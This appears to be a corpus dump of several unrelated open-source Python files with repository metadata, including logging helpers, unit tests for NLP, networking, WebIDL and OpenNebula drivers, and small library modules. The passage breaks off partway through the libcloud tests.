import logging


class StreamToLogger(object):
    """
    Fake file-like stream object that redirects writes to a logger instance.

    Credits to:
    http://www.electricmonk.nl/log/2011/08/14/\
        redirect-stdout-and-stderr-to-a-logger-in-python/
    """
    def __init__(self, logger, log_level=logging.INFO):
        """
        Constructor, defines the logger and level to use to log messages.

        :param logger: logger object to log messages.
        :type logger: logging.Handler
        :param log_level: the level to use to log messages through the logger.
        :type log_level: int
                         look at logging-levels in 'logging' docs.
        """
        self._logger = logger
        self._log_level = log_level

    def write(self, data):
        """
        Simulates the 'write' method in a file object.
        It writes the data received in 'data' to the logger 'self._logger'.

        :param data: data to write to the 'file'
        :type data: str
        """
        for line in data.rstrip().splitlines():
            self._logger.log(self._log_level, line.rstrip())

    def flush(self):
        """
        Dummy method. Needed to replace the twisted.log output.
        """
        pass
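The class docstring describes stdout/stderr redirection; a minimal usage sketch along the lines of the cited blog post (the logger names here are arbitrary choices, not part of the original module):

import logging
import sys

logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(levelname)s %(name)s %(message)s')

# Anything printed, or written to stderr, now ends up in the log instead.
sys.stdout = StreamToLogger(logging.getLogger('STDOUT'), logging.INFO)
sys.stderr = StreamToLogger(logging.getLogger('STDERR'), logging.ERROR)

print("this line is logged at INFO level")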
gpl-3.0
domenicosolazzo/jroc
tests/jroc/nlp/pos/nltk/test_taggerstorage.py
1
1821
# -*- coding: utf-8 -*-
from . import TaggerStorageAdapter
import unittest
import os
import codecs


class TaggerStorageAdapterTestCase(unittest.TestCase):
    taggerStorage = TaggerStorageAdapter()
    currentDirectory = "%s" % (os.path.dirname(os.path.realpath(__file__)), )
    testTextsDirectory = "%s/../../../../data/text/" % (currentDirectory, )

    def setUp(self):
        text = "Det er norsk"
        self.taggerStorage = TaggerStorageAdapter()

    def tearDown(self):
        #self.obtManager.cleanUp()
        self.taggerStorage = None

    def test_pos_initizialize(self):
        """
        Check if the initialization works
        """
        result = self.taggerStorage.getTagger()
        self.assertTrue(result is not None)

    def test_pos_initizialize_with_aubt(self):
        """
        Check if the initialization works with AUBT
        """
        self.taggerStorage = TaggerStorageAdapter(model='aubt')
        result = self.taggerStorage.getTagger()
        self.assertTrue(result is not None)

    def test_pos_classifier_text_english(self):
        """
        Test the classifier tagger with an english text
        """
        text = self.helper_readFilename("en/article1.txt")
        text = text.decode('utf-8').split()
        result = self.taggerStorage.getTagger().tag(text)
        expected = (u'Congress\u2019s', u'NNP')

        self.assertTrue(isinstance(result, list))
        self.assertTrue(len(result) > 0)
        self.assertEqual(expected, result[0])

    def helper_readFilename(self, filename=''):
        stopwords = []
        if not filename:
            raise Exception("The file is empty")

        fileToRead = "%s%s" % (self.testTextsDirectory, filename)
        with open(fileToRead) as f:
            text = f.read()
        #f.close()
        return text
gpl-3.0
karsev/mbed-os
TESTS/netsocket/host_tests/udp_shotgun.py
39
4553
""" mbed SDK Copyright (c) 2011-2013 ARM Limited Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import sys import socket import json import random import itertools import time from sys import stdout from threading import Thread from SocketServer import BaseRequestHandler, UDPServer from mbed_host_tests import BaseHostTest, event_callback class UDPEchoClientHandler(BaseRequestHandler): def handle(self): """ UDP packet handler. Responds with multiple simultaneous packets """ data, sock = self.request pattern = [ord(d) << 4 for d in data] # Each byte in request indicates size of packet to recieve # Each packet size is shifted over by 4 to fit in a byte, which # avoids any issues with endianess or decoding for packet in pattern: data = [random.randint(0, 255) for _ in range(packet-1)] data.append(reduce(lambda a,b: a^b, data)) data = ''.join(map(chr, data)) sock.sendto(data, self.client_address) # Sleep a tiny bit to compensate for local network time.sleep(0.01) class UDPEchoClientTest(BaseHostTest): def __init__(self): """ Initialise test parameters. :return: """ BaseHostTest.__init__(self) self.SERVER_IP = None # Will be determined after knowing the target IP self.SERVER_PORT = 0 # Let TCPServer choose an arbitrary port self.server = None self.server_thread = None self.target_ip = None @staticmethod def find_interface_to_target_addr(target_ip): """ Finds IP address of the interface through which it is connected to the target. :return: """ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect((target_ip, 0)) # Target IP, any port except socket.error: s.connect((target_ip, 8000)) # Target IP, 'random' port ip = s.getsockname()[0] s.close() return ip def setup_udp_server(self): """ sets up a UDP server for target to connect and send test data. :return: """ # !NOTE: There should mechanism to assert in the host test if self.SERVER_IP is None: self.log("setup_udp_server() called before determining server IP!") self.notify_complete(False) # Returning none will suppress host test from printing success code self.server = UDPServer((self.SERVER_IP, self.SERVER_PORT), UDPEchoClientHandler) ip, port = self.server.server_address self.SERVER_PORT = port self.server.allow_reuse_address = True self.log("HOST: Listening for UDP packets: " + self.SERVER_IP + ":" + str(self.SERVER_PORT)) self.server_thread = Thread(target=UDPEchoClientTest.server_thread_func, args=(self,)) self.server_thread.start() @staticmethod def server_thread_func(this): """ Thread function to run TCP server forever. :param this: :return: """ this.server.serve_forever() @event_callback("target_ip") def _callback_target_ip(self, key, value, timestamp): """ Callback to handle reception of target's IP address. 
:param key: :param value: :param timestamp: :return: """ self.target_ip = value self.SERVER_IP = self.find_interface_to_target_addr(self.target_ip) self.setup_udp_server() @event_callback("host_ip") def _callback_host_ip(self, key, value, timestamp): """ Callback for request for host IP Addr """ self.send_kv("host_ip", self.SERVER_IP) @event_callback("host_port") def _callback_host_port(self, key, value, timestamp): """ Callback for request for host port """ self.send_kv("host_port", self.SERVER_PORT) def teardown(self): if self.server: self.server.shutdown() self.server_thread.join()
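Each response packet generated by UDPEchoClientHandler carries the XOR of its data bytes as the final byte, so a receiver can validate a packet by XOR-ing everything it got and checking for zero. A short sketch of that check (the real validation happens on the embedded target, not in this host script):

def packet_is_valid(payload):
    # payload: the raw bytes of one response packet, checksum byte included.
    # The XOR of the data bytes equals the trailing checksum byte exactly
    # when the XOR over the whole packet is zero.
    checksum = 0
    for byte in bytearray(payload):
        checksum ^= byte
    return checksum == 0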
apache-2.0
pnavarro/neutron
neutron/tests/base.py
1
13886
# Copyright 2010-2011 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Base test cases for all neutron tests. """ import contextlib import gc import logging as std_logging import os import os.path import random import traceback import weakref import eventlet.timeout import fixtures import mock from oslo_concurrency.fixture import lockutils from oslo_config import cfg from oslo_messaging import conffixture as messaging_conffixture from oslo_utils import strutils import testtools from neutron.agent.linux import external_process from neutron.common import config from neutron.common import rpc as n_rpc from neutron.db import agentschedulers_db from neutron import manager from neutron import policy from neutron.tests import fake_notifier from neutron.tests import post_mortem_debug CONF = cfg.CONF CONF.import_opt('state_path', 'neutron.common.config') LOG_FORMAT = "%(asctime)s %(levelname)8s [%(name)s] %(message)s" ROOTDIR = os.path.dirname(__file__) ETCDIR = os.path.join(ROOTDIR, 'etc') def etcdir(*p): return os.path.join(ETCDIR, *p) def fake_use_fatal_exceptions(*args): return True def fake_consume_in_threads(self): return [] def get_rand_name(max_length=None, prefix='test'): """Return a random string. The string will start with 'prefix' and will be exactly 'max_length'. If 'max_length' is None, then exactly 8 random characters, each hexadecimal, will be added. In case len(prefix) <= len(max_length), ValueError will be raised to indicate the problem. """ if max_length: length = max_length - len(prefix) if length <= 0: raise ValueError("'max_length' must be bigger than 'len(prefix)'.") suffix = ''.join(str(random.randint(0, 9)) for i in range(length)) else: suffix = hex(random.randint(0x10000000, 0x7fffffff))[2:] return prefix + suffix def bool_from_env(key, strict=False, default=False): value = os.environ.get(key) return strutils.bool_from_string(value, strict=strict, default=default) def get_test_timeout(default=0): return int(os.environ.get('OS_TEST_TIMEOUT', 0)) class AttributeDict(dict): """ Provide attribute access (dict.key) to dictionary values. """ def __getattr__(self, name): """Allow attribute access for all keys in the dict.""" if name in self: return self[name] raise AttributeError(_("Unknown attribute '%s'.") % name) class DietTestCase(testtools.TestCase): """Same great taste, less filling. BaseTestCase is responsible for doing lots of plugin-centric setup that not all tests require (or can tolerate). This class provides only functionality that is common across all tests. 
""" def setUp(self): super(DietTestCase, self).setUp() # Configure this first to ensure pm debugging support for setUp() debugger = os.environ.get('OS_POST_MORTEM_DEBUGGER') if debugger: self.addOnException(post_mortem_debug.get_exception_handler( debugger)) if bool_from_env('OS_DEBUG'): _level = std_logging.DEBUG else: _level = std_logging.INFO capture_logs = bool_from_env('OS_LOG_CAPTURE') if not capture_logs: std_logging.basicConfig(format=LOG_FORMAT, level=_level) self.log_fixture = self.useFixture( fixtures.FakeLogger( format=LOG_FORMAT, level=_level, nuke_handlers=capture_logs, )) test_timeout = get_test_timeout() if test_timeout == -1: test_timeout = 0 if test_timeout > 0: self.useFixture(fixtures.Timeout(test_timeout, gentle=True)) # If someone does use tempfile directly, ensure that it's cleaned up self.useFixture(fixtures.NestedTempfile()) self.useFixture(fixtures.TempHomeDir()) self.addCleanup(mock.patch.stopall) if bool_from_env('OS_STDOUT_CAPTURE'): stdout = self.useFixture(fixtures.StringStream('stdout')).stream self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout)) if bool_from_env('OS_STDERR_CAPTURE'): stderr = self.useFixture(fixtures.StringStream('stderr')).stream self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr)) self.addOnException(self.check_for_systemexit) def check_for_systemexit(self, exc_info): if isinstance(exc_info[1], SystemExit): self.fail("A SystemExit was raised during the test. %s" % traceback.format_exception(*exc_info)) @contextlib.contextmanager def assert_max_execution_time(self, max_execution_time=5): with eventlet.timeout.Timeout(max_execution_time, False): yield return self.fail('Execution of this test timed out') def assertOrderedEqual(self, expected, actual): expect_val = self.sort_dict_lists(expected) actual_val = self.sort_dict_lists(actual) self.assertEqual(expect_val, actual_val) def sort_dict_lists(self, dic): for key, value in dic.iteritems(): if isinstance(value, list): dic[key] = sorted(value) elif isinstance(value, dict): dic[key] = self.sort_dict_lists(value) return dic def assertDictSupersetOf(self, expected_subset, actual_superset): """Checks that actual dict contains the expected dict. After checking that the arguments are of the right type, this checks that each item in expected_subset is in, and matches, what is in actual_superset. Separate tests are done, so that detailed info can be reported upon failure. """ if not isinstance(expected_subset, dict): self.fail("expected_subset (%s) is not an instance of dict" % type(expected_subset)) if not isinstance(actual_superset, dict): self.fail("actual_superset (%s) is not an instance of dict" % type(actual_superset)) for k, v in expected_subset.items(): self.assertIn(k, actual_superset) self.assertEqual(v, actual_superset[k], "Key %(key)s expected: %(exp)r, actual %(act)r" % {'key': k, 'exp': v, 'act': actual_superset[k]}) class ProcessMonitorFixture(fixtures.Fixture): """Test fixture to capture and cleanup any spawn process monitor.""" def setUp(self): super(ProcessMonitorFixture, self).setUp() self.old_callable = ( external_process.ProcessMonitor._spawn_checking_thread) p = mock.patch("neutron.agent.linux.external_process.ProcessMonitor." 
"_spawn_checking_thread", new=lambda x: self.record_calls(x)) p.start() self.instances = [] self.addCleanup(self.stop) def stop(self): for instance in self.instances: instance.stop() def record_calls(self, instance): self.old_callable(instance) self.instances.append(instance) class BaseTestCase(DietTestCase): @staticmethod def config_parse(conf=None, args=None): """Create the default configurations.""" # neutron.conf.test includes rpc_backend which needs to be cleaned up if args is None: args = [] args += ['--config-file', etcdir('neutron.conf.test')] if conf is None: config.init(args=args) else: conf(args) def setUp(self): super(BaseTestCase, self).setUp() # suppress all but errors here capture_logs = bool_from_env('OS_LOG_CAPTURE') self.useFixture( fixtures.FakeLogger( name='neutron.api.extensions', format=LOG_FORMAT, level=std_logging.ERROR, nuke_handlers=capture_logs, )) self.useFixture(lockutils.ExternalLockFixture()) cfg.CONF.set_override('state_path', self.get_default_temp_dir().path) self.addCleanup(CONF.reset) self.useFixture(ProcessMonitorFixture()) self.useFixture(fixtures.MonkeyPatch( 'neutron.common.exceptions.NeutronException.use_fatal_exceptions', fake_use_fatal_exceptions)) self.setup_rpc_mocks() self.setup_config() policy.init() self.addCleanup(policy.reset) def get_new_temp_dir(self): """Create a new temporary directory. :returns fixtures.TempDir """ return self.useFixture(fixtures.TempDir()) def get_default_temp_dir(self): """Create a default temporary directory. Returns the same directory during the whole test case. :returns fixtures.TempDir """ if not hasattr(self, '_temp_dir'): self._temp_dir = self.get_new_temp_dir() return self._temp_dir def get_temp_file_path(self, filename, root=None): """Returns an absolute path for a temporary file. If root is None, the file is created in default temporary directory. It also creates the directory if it's not initialized yet. If root is not None, the file is created inside the directory passed as root= argument. :param filename: filename :type filename: string :param root: temporary directory to create a new file in :type root: fixtures.TempDir :returns absolute file path string """ root = root or self.get_default_temp_dir() return root.join(filename) def setup_rpc_mocks(self): # don't actually start RPC listeners when testing self.useFixture(fixtures.MonkeyPatch( 'neutron.common.rpc.Connection.consume_in_threads', fake_consume_in_threads)) self.useFixture(fixtures.MonkeyPatch( 'oslo_messaging.Notifier', fake_notifier.FakeNotifier)) self.messaging_conf = messaging_conffixture.ConfFixture(CONF) self.messaging_conf.transport_driver = 'fake' # NOTE(russellb) We want all calls to return immediately. self.messaging_conf.response_timeout = 0 self.useFixture(self.messaging_conf) self.addCleanup(n_rpc.clear_extra_exmods) n_rpc.add_extra_exmods('neutron.test') self.addCleanup(n_rpc.cleanup) n_rpc.init(CONF) def setup_config(self, args=None): """Tests that need a non-default config can override this method.""" self.config_parse(args=args) def config(self, **kw): """Override some configuration values. The keyword arguments are the names of configuration options to override and their values. If a group argument is supplied, the overrides are applied to the specified configuration option group. All overrides are automatically cleared at the end of the current test by the fixtures cleanup process. 
""" group = kw.pop('group', None) for k, v in kw.iteritems(): CONF.set_override(k, v, group) def setup_coreplugin(self, core_plugin=None): self.useFixture(PluginFixture(core_plugin)) def setup_notification_driver(self, notification_driver=None): self.addCleanup(fake_notifier.reset) if notification_driver is None: notification_driver = [fake_notifier.__name__] cfg.CONF.set_override("notification_driver", notification_driver) class PluginFixture(fixtures.Fixture): def __init__(self, core_plugin=None): self.core_plugin = core_plugin def setUp(self): super(PluginFixture, self).setUp() self.dhcp_periodic_p = mock.patch( 'neutron.db.agentschedulers_db.DhcpAgentSchedulerDbMixin.' 'start_periodic_dhcp_agent_status_check') self.patched_dhcp_periodic = self.dhcp_periodic_p.start() # Plugin cleanup should be triggered last so that # test-specific cleanup has a chance to release references. self.addCleanup(self.cleanup_core_plugin) if self.core_plugin is not None: cfg.CONF.set_override('core_plugin', self.core_plugin) def cleanup_core_plugin(self): """Ensure that the core plugin is deallocated.""" nm = manager.NeutronManager if not nm.has_instance(): return # TODO(marun) Fix plugins that do not properly initialize notifiers agentschedulers_db.AgentSchedulerDbMixin.agent_notifiers = {} # Perform a check for deallocation only if explicitly # configured to do so since calling gc.collect() after every # test increases test suite execution time by ~50%. check_plugin_deallocation = ( bool_from_env('OS_CHECK_PLUGIN_DEALLOCATION')) if check_plugin_deallocation: plugin = weakref.ref(nm._instance.plugin) nm.clear_instance() if check_plugin_deallocation: gc.collect() # TODO(marun) Ensure that mocks are deallocated? if plugin() and not isinstance(plugin(), mock.Base): raise AssertionError( 'The plugin for this test was not deallocated.')
apache-2.0
ryancanhelpyou/servo
components/script/dom/bindings/codegen/parser/tests/test_enum.py
134
2866
import WebIDL

def WebIDLTest(parser, harness):
    parser.parse("""
      enum TestEnum {
        "",
        "foo",
        "bar"
      };

      interface TestEnumInterface {
        TestEnum doFoo(boolean arg);
        readonly attribute TestEnum foo;
      };
    """)
    results = parser.finish()

    harness.ok(True, "TestEnumInterfaces interface parsed without error.")
    harness.check(len(results), 2, "Should be one production")
    harness.ok(isinstance(results[0], WebIDL.IDLEnum),
               "Should be an IDLEnum")
    harness.ok(isinstance(results[1], WebIDL.IDLInterface),
               "Should be an IDLInterface")

    enum = results[0]
    harness.check(enum.identifier.QName(), "::TestEnum", "Enum has the right QName")
    harness.check(enum.identifier.name, "TestEnum", "Enum has the right name")
    harness.check(enum.values(), ["", "foo", "bar"], "Enum has the right values")

    iface = results[1]

    harness.check(iface.identifier.QName(), "::TestEnumInterface",
                  "Interface has the right QName")
    harness.check(iface.identifier.name, "TestEnumInterface",
                  "Interface has the right name")
    harness.check(iface.parent, None, "Interface has no parent")

    members = iface.members
    harness.check(len(members), 2, "Should be one production")
    harness.ok(isinstance(members[0], WebIDL.IDLMethod),
               "Should be an IDLMethod")
    method = members[0]
    harness.check(method.identifier.QName(), "::TestEnumInterface::doFoo",
                  "Method has correct QName")
    harness.check(method.identifier.name, "doFoo", "Method has correct name")

    signatures = method.signatures()
    harness.check(len(signatures), 1, "Expect one signature")

    (returnType, arguments) = signatures[0]
    harness.check(str(returnType), "TestEnum (Wrapper)",
                  "Method type is the correct name")
    harness.check(len(arguments), 1, "Method has the right number of arguments")
    arg = arguments[0]
    harness.ok(isinstance(arg, WebIDL.IDLArgument), "Should be an IDLArgument")
    harness.check(str(arg.type), "Boolean", "Argument has the right type")

    attr = members[1]
    harness.check(attr.identifier.QName(), "::TestEnumInterface::foo",
                  "Attr has correct QName")
    harness.check(attr.identifier.name, "foo", "Attr has correct name")
    harness.check(str(attr.type), "TestEnum (Wrapper)",
                  "Attr type is the correct name")

    # Now reset our parser
    parser = parser.reset()
    threw = False
    try:
        parser.parse("""
          enum Enum {
            "a",
            "b",
            "c"
          };
          interface TestInterface {
            void foo(optional Enum e = "d");
          };
        """)
        results = parser.finish()
    except:
        threw = True

    harness.ok(threw, "Should not allow a bogus default value for an enum")
mpl-2.0
noslenfa/tdjangorest
uw/lib/python2.7/site-packages/IPython/utils/data.py
3
1165
# encoding: utf-8
"""Utilities for working with data structures like lists, dicts and tuples.
"""

#-----------------------------------------------------------------------------
#  Copyright (C) 2008-2011  The IPython Development Team
#
#  Distributed under the terms of the BSD License.  The full license is in
#  the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------


def uniq_stable(elems):
    """uniq_stable(elems) -> list

    Return from an iterable, a list of all the unique elements in the input,
    but maintaining the order in which they first appear.

    Note: All elements in the input must be hashable for this routine
    to work, as it internally uses a set for efficiency reasons.
    """
    seen = set()
    return [x for x in elems if x not in seen and not seen.add(x)]


def flatten(seq):
    """Flatten a list of lists (NOT recursive, only works for 2d lists)."""

    return [x for subseq in seq for x in subseq]


def chop(seq, size):
    """Chop a sequence into chunks of the given size."""
    return [seq[i:i+size] for i in xrange(0, len(seq), size)]
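The three helpers are small enough that example inputs and outputs say more than the docstrings; the values below follow directly from the definitions (run under Python 2, since chop uses xrange):

assert uniq_stable([1, 2, 1, 3, 2]) == [1, 2, 3]          # order of first appearance kept
assert flatten([[1, 2], [3], [4, 5]]) == [1, 2, 3, 4, 5]  # flattens one level only
assert chop([1, 2, 3, 4, 5], 2) == [[1, 2], [3, 4], [5]]  # last chunk may be short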
apache-2.0
D4wN/brickv
src/build_data/windows/OpenGL/GL/ATI/text_fragment_shader.py
4
3610
'''OpenGL extension ATI.text_fragment_shader

This module customises the behaviour of the
OpenGL.raw.GL.ATI.text_fragment_shader to provide a more
Python-friendly API

Overview (from the spec)

	The ATI_fragment_shader extension exposes a powerful fragment
	processing model that provides a very general means of expressing
	fragment color blending and dependent texture address modification.
	The processing is termed a fragment shader or fragment program and
	is specified using a register-based model in which there are fixed
	numbers of instructions, texture lookups, read/write registers, and
	constants.

	ATI_fragment_shader provides a unified instruction set for operating
	on address or color data and eliminates the distinction between the
	two. That extension provides all the interfaces necessary to fully
	expose this programmable fragment processor in GL.

	ATI_text_fragment_shader is a redefinition of the ATI_fragment_shader
	functionality, using a slightly different interface. The intent of
	creating ATI_text_fragment_shader is to take a step towards treating
	fragment programs similar to other programmable parts of the GL
	rendering pipeline, specifically vertex programs. This new interface
	is intended to appear similar to the ARB_vertex_program API, within
	the limits of the feature set exposed by the original
	ATI_fragment_shader extension.

	The most significant differences between the two extensions are:

	(1) ATI_fragment_shader provides a procedural function call interface
	to specify the fragment program, whereas ATI_text_fragment_shader
	uses a textual string to specify the program. The fundamental syntax
	and constructs of the program "language" remain the same.

	(2) The program object management portions of the interface, namely
	the routines used to create, bind, and delete program objects and set
	program constants are managed using the framework defined by
	ARB_vertex_program.

	(3) ATI_fragment_shader refers to the description of the programmable
	fragment processing as a "fragment shader". In keeping with the
	desire to treat all programmable parts of the pipeline consistently,
	ATI_text_fragment_shader refers to these as "fragment programs". The
	name of the extension is left as ATI_text_fragment_shader instead of
	ATI_text_fragment_program in order to indicate the underlying
	similarity between the API's of the two extensions, and to
	differentiate it from any other potential extensions that may be able
	to move even further in the direction of treating fragment programs
	as just another programmable area of the GL pipeline.

	Although ATI_fragment_shader was originally conceived as a
	device-independent extension that would expose the capabilities of
	future generations of hardware, changing trends in programmable
	hardware have affected the lifespan of this extension. For this
	reason you will now find a fixed set of features and resources
	exposed, and the queries to determine this set have been deprecated
	in ATI_fragment_shader. Further, in ATI_text_fragment_shader, most of
	these resource limits are fixed by the text grammar and the queries
	have been removed altogether.

The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ATI/text_fragment_shader.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ATI.text_fragment_shader import *
### END AUTOGENERATED SECTION
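PyOpenGL's autogenerated extension wrappers conventionally expose a glInit<Extension><VENDOR>() availability check. Assuming this module follows that convention (the exact function name below is inferred from the naming pattern, not confirmed from this file), a runtime check might look like:

# Assumed entry point following PyOpenGL's glInit<Name><VENDOR> convention;
# treat the exact name as an assumption rather than a documented API.
from OpenGL.GL.ATI.text_fragment_shader import glInitTextFragmentShaderATI

def have_text_fragment_shader():
    # Only meaningful once a GL context is current.
    return bool(glInitTextFragmentShaderATI())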
gpl-2.0
Diti24/python-ivi
ivi/agilent/agilentDSA90804A.py
1
1686
""" Python Interchangeable Virtual Instrument Library Copyright (c) 2012-2016 Alex Forencich Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from .agilent90000 import * class agilentDSA90804A(agilent90000): "Agilent Infiniium DSA90804A IVI oscilloscope driver" def __init__(self, *args, **kwargs): self.__dict__.setdefault('_instrument_id', 'DSO90804A') super(agilentDSA90804A, self).__init__(*args, **kwargs) self._analog_channel_count = 4 self._digital_channel_count = 0 self._channel_count = self._analog_channel_count + self._digital_channel_count self._bandwidth = 8e9 self._init_channels()
mit
mtekel/libcloud
libcloud/test/compute/test_opennebula.py
46
46927
# Copyright 2002-2009, Distributed Systems Architecture Group, Universidad # Complutense de Madrid (dsa-research.org) # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ OpenNebula.org test suite. """ __docformat__ = 'epytext' import unittest import sys from libcloud.utils.py3 import httplib from libcloud.compute.base import Node, NodeImage, NodeSize, NodeState from libcloud.compute.drivers.opennebula import OpenNebulaNodeDriver from libcloud.compute.drivers.opennebula import OpenNebulaNetwork from libcloud.compute.drivers.opennebula import OpenNebulaResponse from libcloud.compute.drivers.opennebula import OpenNebulaNodeSize from libcloud.compute.drivers.opennebula import ACTION from libcloud.test.file_fixtures import ComputeFileFixtures from libcloud.common.types import InvalidCredsError from libcloud.test import MockResponse, MockHttp from libcloud.test.compute import TestCaseMixin from libcloud.test.secrets import OPENNEBULA_PARAMS class OpenNebulaCaseMixin(TestCaseMixin): def test_reboot_node_response(self): pass class OpenNebula_ResponseTests(unittest.TestCase): XML = """<?xml version="1.0" encoding="UTF-8"?><root/>""" def test_unauthorized_response(self): http_response = MockResponse(httplib.UNAUTHORIZED, OpenNebula_ResponseTests.XML, headers={'content-type': 'application/xml'}) try: OpenNebulaResponse(http_response, None).parse_body() except InvalidCredsError: exceptionType = sys.exc_info()[0] self.assertEqual(exceptionType, type(InvalidCredsError())) class OpenNebula_1_4_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v1.4. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_1_4_MockHttp, OpenNebula_1_4_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('1.4',)) def test_create_node(self): """ Test create_node functionality. 
""" image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver) size = NodeSize(id=1, name='small', ram=None, disk=None, bandwidth=None, price=None, driver=self.driver) networks = list() networks.append(OpenNebulaNetwork(id=5, name='Network 5', address='192.168.0.0', size=256, driver=self.driver)) networks.append(OpenNebulaNetwork(id=15, name='Network 15', address='192.168.1.0', size=256, driver=self.driver)) node = self.driver.create_node(name='Compute 5', image=image, size=size, networks=networks) self.assertEqual(node.id, '5') self.assertEqual(node.name, 'Compute 5') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].name, None) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].address, '192.168.0.1') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[1].name, None) self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].address, '192.168.1.1') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.private_ips, []) self.assertEqual(node.image.id, '5') self.assertEqual(node.image.extra['dev'], 'sda1') def test_destroy_node(self): """ Test destroy_node functionality. """ node = Node(5, None, None, None, None, self.driver) ret = self.driver.destroy_node(node) self.assertTrue(ret) def test_list_nodes(self): """ Test list_nodes functionality. """ nodes = self.driver.list_nodes() self.assertEqual(len(nodes), 3) node = nodes[0] self.assertEqual(node.id, '5') self.assertEqual(node.name, 'Compute 5') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, None) self.assertEqual(node.public_ips[0].address, '192.168.0.1') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, None) self.assertEqual(node.public_ips[1].address, '192.168.1.1') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.private_ips, []) self.assertEqual(node.image.id, '5') self.assertEqual(node.image.extra['dev'], 'sda1') node = nodes[1] self.assertEqual(node.id, '15') self.assertEqual(node.name, 'Compute 15') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, None) self.assertEqual(node.public_ips[0].address, '192.168.0.2') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, None) self.assertEqual(node.public_ips[1].address, '192.168.1.2') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.private_ips, []) self.assertEqual(node.image.id, '15') self.assertEqual(node.image.extra['dev'], 'sda1') node = nodes[2] self.assertEqual(node.id, '25') self.assertEqual(node.name, 'Compute 25') self.assertEqual(node.state, NodeState.UNKNOWN) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, None) self.assertEqual(node.public_ips[0].address, '192.168.0.3') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, None) self.assertEqual(node.public_ips[1].address, '192.168.1.3') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.private_ips, []) self.assertEqual(node.image, None) def test_list_images(self): """ Test list_images functionality. 
